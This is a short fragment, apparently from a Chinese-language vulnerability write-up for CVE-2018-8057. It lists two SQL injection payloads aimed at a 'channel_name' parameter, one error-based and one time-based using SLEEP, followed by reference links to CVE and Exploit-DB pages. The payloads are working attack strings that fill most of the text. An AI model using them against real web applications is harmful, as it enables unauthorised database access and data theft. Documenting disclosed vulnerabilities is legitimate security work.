1.channel_name=test" AND (SELECT 1700 FROM(SELECT COUNT(*),CONCAT(0x7171706b71,(SELECT (ELT(1700=1700,1))),0x71786a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- JQon&platform=1
2.channel_name=test" AND SLEEP(5)-- NklJ&platform=1


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/30/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8057
EXPLOIT-DB:https://www.exploit-db.com/exploits/44454/